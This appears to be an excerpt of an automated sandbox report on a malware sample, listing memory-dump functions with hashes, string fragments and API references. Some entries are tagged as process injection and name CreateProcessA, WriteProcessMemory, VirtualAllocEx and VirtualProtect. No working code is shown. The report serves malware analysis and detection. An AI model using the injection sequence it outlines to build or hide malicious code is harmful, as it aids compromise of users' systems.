Opcode Fuzzy Hash: 64f1c61caec5511cb1f5485b278b2e90ca311c1c4a8ae6262f4e21286b949cbe
Instruction Fuzzy Hash: 49C1B074E06218CFEB54DF69E984BADBBF6FF89344F1090A9D419A7250DB346A85CF00

Uniqueness

Uniqueness Score: -1.00%

Function 05B7D540 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88bdc448df5bcdb26ed97fd95435d43da5a6d92a308745df9a463c278ed2e2f
Instruction ID: 9a4230b7a8f6062ae4e47b70248de274d96243f45ee2f5e55f7f08a871149f5c
Opcode Fuzzy Hash: a88bdc448df5bcdb26ed97fd95435d43da5a6d92a308745df9a463c278ed2e2f
Instruction Fuzzy Hash: 8BC1BF74E06218CFEB54DF69E984BADBBF6FF89340F1090A9D41AA7250DB346985CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05B7D5E2 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649369753.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b70000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cbd5806ee9efbcdba42c031aae0be89d892e6d2f30eabfd5d035d7aa11156c6
Instruction ID: 1ad3cc9a7a1cfb8f04f45797a5be46f73cc31eb22b5f77394d05d51e47bdcc1d
Opcode Fuzzy Hash: 6cbd5806ee9efbcdba42c031aae0be89d892e6d2f30eabfd5d035d7aa11156c6
Instruction Fuzzy Hash: DFB18E74E06218CFDB54DFA9E984BADBBF6FF49340F1094A9D41AA7250DB346985CF00

Uniqueness

Uniqueness Score: -1.00%

Function 02F65188 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14cd74a7fa930dc378a7bc834b2333f0d5ada1db4ffd425a13e79720dafc2f66
Instruction ID: 2571eaa854a0cf2951273bebbde5f8577ac813f629447ecd06aefba9fcd01ddd
Opcode Fuzzy Hash: 14cd74a7fa930dc378a7bc834b2333f0d5ada1db4ffd425a13e79720dafc2f66
Instruction Fuzzy Hash: 67817D71A00609CFE715CF89C9887BAB7B2FBC4390F94C567CA15AB658D334A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05B45803 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79372a21a93d6dbd033d84f64785db870f42715aef37af20ee381a1699a11cbd
Instruction ID: e717a0c345a50e7eb5aeba6c490c8b9c3ea12876837c646b265671c0857cd756
Opcode Fuzzy Hash: 79372a21a93d6dbd033d84f64785db870f42715aef37af20ee381a1699a11cbd
Instruction Fuzzy Hash: 1B61B270D46618CFDB34CFA9D949BADBBF2BF49300F1490A9D40AAB291DB746985DF00

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A0F0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5203faa2e33cec6732517a27a61d18bd2d39671051746c11e2359cbec1c2525f
Instruction ID: adb2b3acab99c58371419084fe0b4060bcd352c353f73f7ebe9b22a3a72dc8a3
Opcode Fuzzy Hash: 5203faa2e33cec6732517a27a61d18bd2d39671051746c11e2359cbec1c2525f
Instruction Fuzzy Hash: 2C5119B1E006588BEB18CF6BD94479AFBF3BFC8304F14C1AAD508A6255EB340A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05B44C58 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d10870b9d75efcf2f157b77bf83d3f069bb6ff321483d88d0588c2030afbbbf
Instruction ID: 74a8b9214050edad031f739dd6853547966d9030f66e1e98c9de4996f32cec6b
Opcode Fuzzy Hash: 0d10870b9d75efcf2f157b77bf83d3f069bb6ff321483d88d0588c2030afbbbf
Instruction Fuzzy Hash: 0E4146B5E016198BDB18CFABD94069EFBF3BFC8300F14C16AD558AB224EB3459458F54

Uniqueness

Uniqueness Score: -1.00%

Function 05B44C60 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4644ac1900111a54787fd67108b3a989eeb804621a2b2eae615302c616c0ea55
Instruction ID: 000c2c759d29ff3b8c83fe34db035799e626da755e6979135fb38267aa5691b3
Opcode Fuzzy Hash: 4644ac1900111a54787fd67108b3a989eeb804621a2b2eae615302c616c0ea55
Instruction Fuzzy Hash: E74139B5E016198BDB1CCFABC94069EFAF3BFC8300F14C07A9958AB264EB7459418F54

Uniqueness

Uniqueness Score: -1.00%

Function 05AD74C8 Relevance: 4.2, Strings: 3, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 05AD799D
Hbq, xrefs: 05AD7A1C
Hbq, xrefs: 05AD79CC

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: e15ba6802177c04d65021ffae27438c976ce6f109dec8704adbd2bf6f41e58d2
Instruction ID: 217a9a970bbb7ca9b7b1111cefeb817addb677f9910032d52f3387003af38170
Opcode Fuzzy Hash: e15ba6802177c04d65021ffae27438c976ce6f109dec8704adbd2bf6f41e58d2
Instruction Fuzzy Hash: D6123035B002059FCB68EFA9D594A6EBBF2FF88300F148569D4169B394DB35EC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05AD9188 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 05AD93A2
4'^q, xrefs: 05AD9481
4'^q, xrefs: 05AD9501

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 506c3d6da2f3c67deb70b746d54cf32cbab4d6b11c8af8e547dd8ce03fc817a3
Instruction ID: 05bfdcee10e6bbcaf235a33646054d99e2199a1691e44d36e2f7cb326f425595
Opcode Fuzzy Hash: 506c3d6da2f3c67deb70b746d54cf32cbab4d6b11c8af8e547dd8ce03fc817a3
Instruction Fuzzy Hash: C1F1B834A10118DFCB08EBA4D598E9DBBB2FF88305F118558E506AB3A5DB35EC46CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05ADD752 Relevance: 4.0, Strings: 3, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05ADD889
(bq, xrefs: 05ADD8B5
Hbq, xrefs: 05ADD8E1

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq$(bq$Hbq
API String ID: 0-2835675688
Opcode ID: 203745e1868b585389defcb284e6e5622396269e3463ba1b9bdf1669f1b6ed05
Instruction ID: 0680b8aee1909757992735946604b4ae7924c8cdb8dfb822724d40d779d6ddf4
Opcode Fuzzy Hash: 203745e1868b585389defcb284e6e5622396269e3463ba1b9bdf1669f1b6ed05
Instruction Fuzzy Hash: 6281D132B002099FCB15EF68D48496EBBB2FFC5300F1585A9E406AB365DB34ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 059B0D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'^q, xrefs: 059B1559
4'^q, xrefs: 059B1549

Memory Dump Source

Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 0a12ec4d342f1fa62cdfadef2c420d73a71ec1c9c2b30968d68690469cf6b525
Instruction ID: 83d706a2dcaa17f4948792237605d46eb98e04c6bbe27645293574c0c020be5e
Opcode Fuzzy Hash: 0a12ec4d342f1fa62cdfadef2c420d73a71ec1c9c2b30968d68690469cf6b525
Instruction Fuzzy Hash: 5E420935E04209CFEB14DFA4D699AFEBBB6FB48300F108459D512AB394DB74A982CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05AD3A19 Relevance: 3.0, Strings: 2, Instructions: 484
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05AD3D43
$^q, xrefs: 05AD3D33

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: c45d8e9ea2c26675fda58c9e97b24f5a2424435bf073e15f850aa434a1f060db
Instruction ID: 9012b14d1e813580aa98c9f411d5a5458ebac75b06f4c653122a02506d3bd176
Opcode Fuzzy Hash: c45d8e9ea2c26675fda58c9e97b24f5a2424435bf073e15f850aa434a1f060db
Instruction Fuzzy Hash: 65127B31B002199FCF15EFA4C955EBDBBF2BF48700F144816E852AB295DB34AD46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05AD6B78 Relevance: 2.8, Strings: 2, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05AD6B8C
d, xrefs: 05AD6DD9

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq$d
API String ID: 0-3334038649
Opcode ID: b5b1c47a2cc573bdde03c8bb6460b206777c4766832f32a1199543f81839f663
Instruction ID: e047f3ba517560aae9ab351d1083a85f2349226fab00ccb2f27c657ff7c904e2
Opcode Fuzzy Hash: b5b1c47a2cc573bdde03c8bb6460b206777c4766832f32a1199543f81839f663
Instruction Fuzzy Hash: ACD16C356006068FCB14DF69C484D6AFBF2FF88311B558959E46A9B365DB30FC46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 059B18C0 Relevance: 2.8, Strings: 2, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 059B1CF4
4'^q, xrefs: 059B1CE4

Memory Dump Source

Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: fd8a94424711e1418d0fb7d87eba0cb3dc62009bc1db678a7504eeabd05fd7e9
Instruction ID: 78b983d98450cddb68816414a63f20e58339336fed503e63492761c47a269c2b
Opcode Fuzzy Hash: fd8a94424711e1418d0fb7d87eba0cb3dc62009bc1db678a7504eeabd05fd7e9
Instruction Fuzzy Hash: B2E1F735E14218DFEB18DFA4E5A9AECBBB6FF89311F208429E416A7350CB756845CF10

Uniqueness

Uniqueness Score: -1.00%

Function 059B24A8 Relevance: 2.8, Strings: 2, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 059B2827
4'^q, xrefs: 059B2837

Memory Dump Source

Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: b1af94383f583c24ea3f488e6fb723aa500da144c535ba380b80006018020ecf
Instruction ID: 7d40e7ed63cd1cc2fa342d237c977de0a535e0516976fe524fcf3086c4a1fbc7
Opcode Fuzzy Hash: b1af94383f583c24ea3f488e6fb723aa500da144c535ba380b80006018020ecf
Instruction Fuzzy Hash: 19C10578E04209CFEF18DFA4C5996EDBBB6FF48301F10842AD4126B290DBB46982CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059B1598 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 059B1878
4'^q, xrefs: 059B1888

Memory Dump Source

Source File: 00000000.00000002.1648735395.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59b0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 1e9e8371e264d7f940941c3a75fb34276246049f33ad73db4bc73a5ce13cdfc8
Instruction ID: dd7d0a405c08aae12ffe37418ed62b459683604c3e61a7547d515846d8bec6e9
Opcode Fuzzy Hash: 1e9e8371e264d7f940941c3a75fb34276246049f33ad73db4bc73a5ce13cdfc8
Instruction Fuzzy Hash: 24A10875E04209CFEB18DFA4D59A6EDBBB6FF89301F148429E41267390CB74A946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05AD2FE8 Relevance: 2.7, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05AD30EE
Hbq, xrefs: 05AD317D

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: dbb334222a58e3170d27c02b9f076cd39a997664fb2b7f24897542c8246e3b25
Instruction ID: cd8873228a984f95b3406f1c1b25f3d5a94e9d7372c66f06f31d8c29a3194df8
Opcode Fuzzy Hash: dbb334222a58e3170d27c02b9f076cd39a997664fb2b7f24897542c8246e3b25
Instruction Fuzzy Hash: 8B515D367002158FCB65AF39C454A2EBBB6FFC9301B10886DE5069B3A1DE35ED06CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05AD55A9 Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05AD56CC
(bq, xrefs: 05AD5723

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: b5961907be88ec99d045b8b71555d7bbde941415d340ed11c58e05b56f9aa3e5
Instruction ID: 3e3da44e2ccdafbd7020d40a7443034e3eb9125e7b399634c57cc9a0e1dd4058
Opcode Fuzzy Hash: b5961907be88ec99d045b8b71555d7bbde941415d340ed11c58e05b56f9aa3e5
Instruction Fuzzy Hash: 1B5190327002158FCB15DF28D454AAE7BA2FF88741F244169E816CB3A5CF35DD468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 05E7F620 Relevance: 2.6, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 05E7F748
Hbq, xrefs: 05E7F774

Memory Dump Source

Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: fa02dbc35db3eb17d2393968762d3808261e24fa930bd4c9df817a23357a990b
Instruction ID: 3943413b889d0d5120b410957361cee338072d15403b31b73260a1446671b0dc
Opcode Fuzzy Hash: fa02dbc35db3eb17d2393968762d3808261e24fa930bd4c9df817a23357a990b
Instruction Fuzzy Hash: 2241AC322047058FD725DF29C58071ABAF2FF85310F108A69D0A68B7E5DB78E849CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05AD41E8 Relevance: 2.6, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 05AD424F
$^q, xrefs: 05AD423F

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 917a4db7220b94cb97deade6be386769d6b9ea0e90e1abb2fe376a9c57c48280
Instruction ID: cbd91a4160ca467e2356d65dbf6e232cd61a9f5d3d570f75e7c9a33546110c6e
Opcode Fuzzy Hash: 917a4db7220b94cb97deade6be386769d6b9ea0e90e1abb2fe376a9c57c48280
Instruction Fuzzy Hash: 86113C316442099FEF24DF99D444FA9BBFABB58250F144066D426DB264D6B1D980C760

Uniqueness

Uniqueness Score: -1.00%

Function 05E68109 Relevance: 2.5, Strings: 2, Instructions: 34COMMON

Download Yara Rule

Strings

;, xrefs: 05E6816C
Y, xrefs: 05E6819B

Memory Dump Source

Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ;$Y
API String ID: 0-874568597
Opcode ID: 84508983d2c1d457afc138122407583359174960f08335b58c10e3051135711d
Instruction ID: 216dc3b3fc08e761e42b0de18baf0554a7f25d006be16e115c995336f6edaa93
Opcode Fuzzy Hash: 84508983d2c1d457afc138122407583359174960f08335b58c10e3051135711d
Instruction Fuzzy Hash: E811DB74A00129DFDB60DF54D899B9ABBB5FB48348F1040E5964DA7740DB346EC4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05ADA060 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 05ADA3DB

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 1834b404678fcd17955d41e98dce95375cd35a21fea02d432ff7489b7bc8f4cc
Instruction ID: 9af1bd140e1ca3297ef9e5c49c53f803dd8c752dc42198037bf97e80f6d7affc
Opcode Fuzzy Hash: 1834b404678fcd17955d41e98dce95375cd35a21fea02d432ff7489b7bc8f4cc
Instruction Fuzzy Hash: 0D521D75A002288FDB64DF68C985BEDBBF2BF88300F1545D9E509AB391DA349D81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05AD45A0 Relevance: 1.8, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

(_^q, xrefs: 05AD4830

Memory Dump Source

Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: f5319266dc696d0c2a112370ada8b626e1ae5f9d40473e0896146dae9b8c8eda
Instruction ID: fce177297cb8f531026850948dc84dd8c5cb1e97db0888e25af3e23e53baed00
Opcode Fuzzy Hash: f5319266dc696d0c2a112370ada8b626e1ae5f9d40473e0896146dae9b8c8eda
Instruction Fuzzy Hash: FB226F36A002199FDB04EF54D495EADBBF6FF88300F148469E9169B3A5CB75EC40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05D149E5 Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D14C57

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7b46e1af7dd36b0a25f1694788484f80afaba18660dbadbb25196cbc03e7322b
Instruction ID: 3751a147a52798cc428e5ee858ac9f9f0e72ad142a26dd011c4bfc070ebfa6f1
Opcode Fuzzy Hash: 7b46e1af7dd36b0a25f1694788484f80afaba18660dbadbb25196cbc03e7322b
Instruction Fuzzy Hash: B4A113B1D003189FDF10CFA9D985BEDBBF1BB09314F14916AE859A7280DB349985CF49

Uniqueness

Uniqueness Score: -1.00%

Function 05D149F0 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05D14C57

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 86056fca5a2c241afe384bf88f3c5a9575f0d9cfd606dbe40de2e4a9d3096a6b
Instruction ID: bcfc6b66de287592988b9838eaedd499b83bca18dd62c0de10ebd832fee8e5d4
Opcode Fuzzy Hash: 86056fca5a2c241afe384bf88f3c5a9575f0d9cfd606dbe40de2e4a9d3096a6b
Instruction Fuzzy Hash: 3EA102B0D003189FDF10CFA9D985BEEBBF1BB09314F14916AE859A7240DB349985CF89

Uniqueness

Uniqueness Score: -1.00%

Function 05D15698 Relevance: 1.6, APIs: 1, Instructions: 138injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D157B0

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6ba8b4468ecab82754c8b0af317b4fe2f078372513c1b89b592b02a94985ef4a
Instruction ID: ef647f4dcc0bbad8ae2aa2b6ef3b20d07426142f836690dd0b4a97c5c372643d
Opcode Fuzzy Hash: 6ba8b4468ecab82754c8b0af317b4fe2f078372513c1b89b592b02a94985ef4a
Instruction Fuzzy Hash: 7851DDB5D042489FCF00CFA9D984ADEBBF1BF49310F24942AE819B7250D739AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 05D156E0 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05D157B0

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3462dd7b2ae2ba92f4aea2bed692c3df5bd53b476495ee1571a9c8f7b26bc0a1
Instruction ID: 574c4912a59d7fde74e95b4c1e66bd3439adbb6623907e267674a4f498b682d2
Opcode Fuzzy Hash: 3462dd7b2ae2ba92f4aea2bed692c3df5bd53b476495ee1571a9c8f7b26bc0a1
Instruction Fuzzy Hash: 5141AAB5D012589FCF00CFA9D984ADEFBF1BB49314F20902AE819B7210D738AA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 05D15418 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D154CA

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 29690c6bb9319a6dd4d3221e6db4f2f1171ad780658a96b314aa36a98f8f5a9a
Instruction ID: 8b8d2a17b4926323bfc61019dc4e422d7143e0f9da5bd72961990014b7b3dc9b
Opcode Fuzzy Hash: 29690c6bb9319a6dd4d3221e6db4f2f1171ad780658a96b314aa36a98f8f5a9a
Instruction Fuzzy Hash: B03188B9D002589FCF10CFA9E985ADEFBB1BB49310F10942AE815B7310D735A946CF58

Uniqueness

Uniqueness Score: -1.00%

Function 05D15420 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D154CA

Memory Dump Source

Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 05e91252ab16954dab97b87315c9c7e89a378c891ebf7526993a4e20e547f027
Instruction ID: dacdb5f07854804ba431d61a4e9072ee66ab841e5af8e8fed84b5c5e385ddcb7
Opcode Fuzzy Hash: 05e91252ab16954dab97b87315c9c7e89a378c891ebf7526993a4e20e547f027
Instruction Fuzzy Hash: E73187B9D042589FCF10CFA9E980ADEFBB1BB49320F10942AE815B7210D735A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 05C0D5F8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05C0D69C

Memory Dump Source

Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 31607b93e08c2ae47103564a9c1fb1143b950d872f60c1d64c45602292b4a506
Instruction ID: 82b85e791e330621cb654737d146ba39f8d19b5bbdb04c2fbc26686c1529a8db
Opcode Fuzzy Hash: 31607b93e08c2ae47103564a9c1fb1143b950d872f60c1d64c45602292b4a506
Instruction Fuzzy Hash: 413199B4D012589FCF10CFA9D984ADEFBB1BB49320F20942AE819B7210D735A945CF58

Uniqueness

Uniqueness Score: -1.00%

